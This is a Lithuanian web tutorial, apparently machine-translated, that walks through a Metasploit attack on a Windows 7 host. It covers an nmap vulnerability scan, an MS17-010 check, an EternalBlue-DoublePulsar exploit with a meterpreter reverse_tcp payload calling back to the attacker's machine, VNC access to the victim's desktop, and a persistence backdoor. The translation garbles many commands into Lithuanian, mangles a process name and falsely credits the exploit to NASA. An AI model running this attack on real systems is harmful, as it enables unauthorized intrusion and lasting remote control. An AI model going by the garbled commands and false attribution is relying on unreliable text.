metasploit

„Metasploit“ pamoka

„Metasploit“ pamoka

Kadangi aptarėme 25 geriausių „KALI LINUX“ įrankių sąrašą ir iš pradžių į sąrašą įtraukėme METASPLOIT, dabar aptarkime ir sužinokime apie METASPLOIT. Mes rekomenduotume jums susipažinti su „Metasploit“.

Metasploit iš pradžių sukūrė H. D Moore'ą 2003 m., Kol jį įsigijo ir toliau plėtojo „Rapid7“ 2009 m. Spalio 21 d. „Metasploit-framework“ yra visiškai parašytas naudojant „Ruby“ ir yra standartinis paketas, įdiegtas „Kali Linux“ sistemoje (ir, manau, beveik visose „Penetration Testing OS“). Tai įsilaužėlių ar įsiskverbimo bandytojų mėgstamiausias rinkinys, skirtas tirti saugumo spragas, kurti ir vykdyti taikinių išnaudojimus bei kitą saugumo plėtrą.

„Metasploit“ yra keli leidimai, paprastai suskirstyti į dvi kategorijas: nemokama ir mokama. Nemokamos versijos: „Metasploit Framework Community Edition“ (CLI sąsaja) ir „Armitage“ (sąsaja, pagrįsta GUI). Mokamos versijos: „Metasploit Express“, „Metasploit Pro“ ir „Cobalt Strike“ (tai panašu į „Armitage“, kurią teikia „Strategic Cyber ​​LLC“).

„Metasploit“ leidžia vartotojams susikurti (arba sukurti) savo išnaudojimo kodą, tačiau nesijaudinkite, jei nežinote, kaip koduoti, „Metasploit“ turi tiek daug modulių ir jie nuolat atnaujinami. Šiuo metu „Metasploit“ turi daugiau nei 1600 išnaudojimų ir 500 naudingų krovinių. Paprastas būdas suprasti, kas yra išnaudojimai ir naudingosios apkrovos, iš esmės yra tai, kaip užpuolikas pateikia naudingąją apkrovą per tikslinės sistemos pažeidžiamumo skylę.  Kai užpuolikas paleidžia išnaudojimą, kuriame yra apkrova pažeidžiamam taikiniui, tada dislokuota naudingoji apkrova (naudingoji apkrova naudojama prisijungti prie užpuoliko, norint pasiekti nuotolinę prieigą prie tikslinės sistemos), šiame etape išnaudojimas atliekamas ir tampa nebeaktualu.

„„ Metasploit “nėra įsilaužimo momentinis įrankis, tai yra beprotiškas pagrindas“

Šiame „Metasploit“ straipsnyje kalbama apie prasiskverbimo bandymus su tiksline sistema naudojant šį srautą:


PARUOŠIMAS

Įsitikinkite, kad mūsų „Kali Linux“ turi naujausią atnaujintą versiją. Kiekviename atnaujinime bus patobulinimų. Paleiskite šias komandas:

~ # apt atnaujinimas
~ # apt atnaujinimas -y
~ # apt dist-upgrade -y

Kai mūsų mašina yra atnaujinta, dabar galime pradėti sušaudyti metasploit konsolę. Terminale įveskite:

~ # msfconsole

Be to, jums reikia bet kokio teksto redaktoriaus, „Gedit“ ar „Leafpad“, kad pakeliui surinktumėte tam tikrą informaciją, kol mes sudarysime ataką. Pirmiausia nustatykite belaidės sąsajos, maršrutizatoriaus IP ir tinklo kaukės IP adresą.

Remdamiesi aukščiau pateikta informacija, atkreipiame dėmesį į WLAN1 ir maršrutizatoriaus IP adresą bei tinklo kaukę. Taigi, pastaba turėtų atrodyti taip:

Puolėjo IP (LHOST): 192.168.1.56
Vartų / maršrutizatoriaus IP: 192.168.1.1
Tinklo kaukė: 255.255.255.0 (/ 24)


1 ŽINGSNIS: APTARUMO SKENAVIMAS

Tada metasploit konsolėje pirmiausia renkame informaciją, pvz., Tikslinį IP adresą, operacinę sistemą, atidarytus prievadus ir pažeidžiamumą. „Metasploit“ leidžia mums paleisti „NMap“ tiesiai iš konsolės. Remdamiesi aukščiau pateikta informacija, vykdykite šią komandą atlikdami informacijos rinkimo užduotį.

msf> nmap -v 192.168.1.1/24 - scenarijus vuln -Pn -O

Iš aukščiau esančios komandos gavome žemiau pateiktą rezultatą.

Mes gavome pažeidžiamą tikslą, kuriame veikia „Windows“ operacinė sistema, ir pažeidžiamas yra SMBv1 tarnyboje. Taigi, pridėkite prie pastabos.

Tikslinis IP (RHOST): 192.168.1.57
Pažeidžiamumas: nuotolinio kodo vykdymo pažeidžiamumas „Microsoft SMBv1“ serveriuose (ms17-010)


2 ŽINGSNIS: PAJAMUMO VERTINIMAS

Dabar mes žinome taikinį ir jo pažeidžiamumą. Leidžia patikrinti metasploit konsolės pažeidžiamumą

Dabar mes žinome taikinį ir jo pažeidžiamumą. Leidžia patikrinti „metasploit“ konsolės pažeidžiamumą naudojant „smb_scanner“ pagalbinį modulį. Paleiskite šią komandą:

msf> naudokite pagalbinį / skaitytuvą / smb / smb_ms17_010
msf auxiliary (smb_ms17_010)> nustatyti RHOSTS [tikslinis IP]
msf auxiliary (smb_ms17_010)> paleisti

„Metasploit“ yra įsitikinęs dėl pažeidžiamumo ir tiksliai parodo „Windows OS Edition“. Pridėti prie pastabos:

Tikslinė OS: „Windows 7 Ultimate 7600“


3 ŽINGSNIS: NAUDOJIMAS

Laimei, metasploit neturi išnaudojimo modulio, susijusio su šiuo pažeidžiamumu. Tačiau nesijaudinkite, kad lauke yra vaikinas ir parašė išnaudojimo kodą. Išnaudojimas yra žinomas, nes jį inicijavo NASA, jis vadinamas „EternalBlue-DoublePulsar“. Galite jį paimti iš čia arba galite vadovautis žemiau esančio mokymo vaizdo įrašo vadovu, kad įdiegtumėte išnaudojimo kodą savo metasploit sistemoje.

Laikydamiesi pirmiau pateikto vadovo (įsitikinkite, kad kelias yra toks pats kaip pamoka). Dabar esate pasirengęs išnaudoti taikinį. Paleiskite šias komandas:

naudokite util / windows / smb / eternalblue_doublepulsar
nustatyti naudingosios apkrovos langus / meterpreter / reverse_tcp
nustatyti PROCESSINJECT ritiniusv.exe
nustatyti RHOST 192.168.1.57
rinkinys LHOST 192.168.1.56

Išnaudoti

Bumas ... Išnaudoti pavyko, sulaukėme skaitiklio sesijos. Kaip jau minėjau anksčiau, kai paleidžiama eksploatacija, ji įdiegs naudingąją apkrovą, tai yra, čia mes naudojome „Windows“ /skaitiklis/ reverse_tcp.


4 ŽINGSNIS: GAUTI PRIEIGOS NUOTOLINĮ TOLETĄ

Leiskite ištirti daugiau galimų komandų, įveskite "?'(be klaustuko) ir peržiūrėkite išvardytas galimas komandas. The Stdapi, sistemos komandos yra:

Norėdami pamatyti daugiau informacijos apie tikslinę sistemą, naudokite 'sysinfo'komanda. Rezultatas turėtų atrodyti taip.

Kadangi mes įšvirkščiame į sistemos procesą anksčiau (spoolvv.exe), mes gavome sistemos privilegiją. Mums priklauso taikinys. Mes galime daug nuveikti naudodami komandą į taikinį. Pavyzdžiui, mes galime paleisti RDP arba tiesiog nustatyti VNC nuotolinį. Norėdami paleisti VNC paslaugą, įveskite komandą:

~ # paleisti vnc

Rezultatas turėtų būti tikslinis mašinos darbalaukis, jis atrodo taip.

Svarbiausia dalis yra sukurti užpakalinę duris, todėl kai tik taikinys atjungiamas nuo mūsų mašinos, tikslinė mašina bandys vėl prisijungti, vėl su mumis. „Backdooring“ yra naudojamas prieigai palaikyti, tai yra tarsi žvejyba. Jūs neturėsite išmesti savo žuvies atgal į vandenį, kai gausite žuvį, tiesa? Norite ką nors padaryti su žuvimi, nesvarbu, ar išsaugoti ją šaldytuve tolesniems veiksmams, pavyzdžiui, virimui, ar parduoti už pinigus.

Skaitiklis turi šią nuolatinę „backdooring“ funkciją. Paleiskite šią komandą ir pažvelkite į galimus parametrus ir argumentus.

matuoklis> paleisti atkaklumą -h

Jei jums nepatinka šis nebenaudojamas scenarijus, yra naujausias patvarumo modulis paštu / windows / tvarkyti / persistence_exe. Galite patys tai patyrinėti toliau.

„Metasploit“ yra didžiulis, tai ne tik įrankis, bet ir pagrindas, manau, kad jis turi daugiau nei 1600 išnaudojimų ir apie 500 naudingųjų apkrovų. Vienas straipsnis tinka tik bendram naudojimui ar idėjai. Bet jūs tiek daug sužinojote iš šio straipsnio.

„Kuo daugiau jūs sekate atakos srautą, tuo daugiau turite pastangų be vargo.“

Įdiekite naujausią „OpenRA“ strategijos žaidimą „Ubuntu Linux“
„OpenRA“ yra „Free / Free Real Time Strategy“ žaidimų variklis, atkuriantis ankstyvuosius „Westwood“ žaidimus, tokius kaip klasikinis „Command & Conqu...
Įdiekite naujausią „Dolecin Emulator“, skirtą „Gamecube“ ir „Wii“, sistemoje „Linux“
„Delfinų emuliatorius“ leidžia žaisti pasirinktus „Gamecube“ ir „Wii“ žaidimus „Linux“ asmeniniuose kompiuteriuose (PC). „Dolphin Emulator“ yra laisv...
Kaip naudoti „GameConqueror Cheat Engine“ sistemoje „Linux“
Straipsnyje pateikiamas „GameConqueror“ apgaulės variklio naudojimo „Linux“ vadove. Daugelis žaidėjų, žaidžiančių sistemoje „Windows“, dažnai naudoja ...